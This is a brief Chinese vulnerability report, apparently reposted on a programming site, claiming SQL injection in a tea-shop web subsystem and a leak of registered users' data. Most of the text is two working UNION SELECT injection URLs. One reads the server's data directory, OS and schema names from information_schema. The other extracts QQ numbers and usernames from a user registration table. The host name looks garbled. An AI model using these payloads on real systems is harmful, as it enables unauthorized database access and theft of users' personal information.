存在SQL注入。注册用户信息敏感泄漏。 http://tmall.t0001测试数据/index.php?mod=shop_view&act=item&id=-8401%20union%20select%201,2,3,4,5,6,7,@@datadir,@@global.version_compile_os,10,TABLE_SCHEMA,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.KEY_COLUMN_USAGE%20limit%200,1-- http://tmall.t0001测试数据/index.php?mod=shop_view&act=item&id=-8401%20union%20select%201,2,3,4,5,6,7,8,9,qq,username,12,13,14,15,16,17,18,19,20,21%20from%20tmall.reg%20limit%20115,1-- 作者 h2ero
查看更多关于第一茶叶网茶叶街子系统存在SQL注入 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11730